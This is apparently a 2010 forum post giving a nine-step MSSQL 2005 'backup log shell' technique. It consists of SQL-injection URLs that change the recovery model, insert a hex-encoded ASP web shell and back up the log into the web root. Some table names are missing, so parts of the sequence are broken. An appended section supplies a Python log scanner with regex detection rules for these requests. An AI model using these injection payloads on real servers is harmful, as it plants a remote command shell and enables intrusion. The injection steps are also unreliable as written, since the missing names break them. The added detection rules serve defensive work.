韩小末 posted on 2010-2-2 21:36:07

MSSQL 2005 Backup log shell

Step 1
http://www.sb.com/test.asp';alter/**/database/**//**/set/**/recovery/**/full--

Step 2:
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**//**/to/**/disk%3D@d/**/with/**/init--

Step 3
http://www.sb.com/test.asp';drop/**/table/**/--

Step 4
http://www.sb.com/test.asp';create/**/table/**/(/**/image)--

Step 5
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--

Step 6
http://www.sb.com/test.asp';insert/**/into/**/()/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

Step 7
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--

Step 8
http://www.sb.com/test.asp';drop/**/table/**/--

Step 9
http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--
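
For defenders, the requests in the steps above can be flagged in web-server access logs once the `/**/` comment padding and URL encoding are normalized away. The following is an added example, not part of the original post: the simplified `client_ip method target` log format, the rule names, the two-rule threshold and the sample lines are all assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Statement shapes seen in the requests above, matched after normalization.
RULES = {
    "recovery_full": re.compile(r"\balter\s+database\b.*?\bset\s+recovery\s+full\b"),
    "backup_to_disk": re.compile(r"\bbackup\s+(?:log|database)\b.*?\bto\s+disk\s*="),
    "image_table": re.compile(r"\bcreate\s+table\b.*?\bimage\b"),
    "hex_literal": re.compile(r"0x(?:[0-9a-f]{2}){12,}"),
    "stacked_query": re.compile(r"';\s*(?:alter|declare|create|drop|insert|backup)\b"),
}

def normalize(raw: str) -> str:
    """URL-decode, turn inline /* */ comments into spaces, collapse whitespace, lowercase."""
    text = unquote_plus(raw)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def match_rules(raw: str) -> list[str]:
    """Return the sorted names of all rules that fire on one request target."""
    text = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(log_lines, min_rules=2):
    """Yield (line_number, client_ip, rule_names) for requests matching >= min_rules rules."""
    for n, line in enumerate(log_lines, 1):
        fields = line.split()
        if len(fields) < 3:
            continue  # not in the assumed "ip method target" format
        ip, _method, target = fields[:3]
        hits = match_rules(target)
        if len(hits) >= min_rules:
            yield n, ip, hits

# Constructed sample lines (documentation IP ranges, constructed hex literal).
SAMPLE_LOG = [
    "198.51.100.7 GET /test.asp?id=1';alter/**/database/**//**/set/**/recovery/**/full--",
    "198.51.100.7 GET /test.asp?id=1';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x"
    + "41" * 12 + "/**/backup/**/log/**//**/to/**/disk%3D@d/**/with/**/init--",
    "203.0.113.9 GET /news.asp?id=42&title=backup+log+rotation+guide",
]

if __name__ == "__main__":
    for n, ip, hits in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(hits)}")
```

On the database side, the same activity shows up as an unexpected recovery-model change followed by `BACKUP LOG` writing to a path under the web root, which the application's database account should not have permission to do.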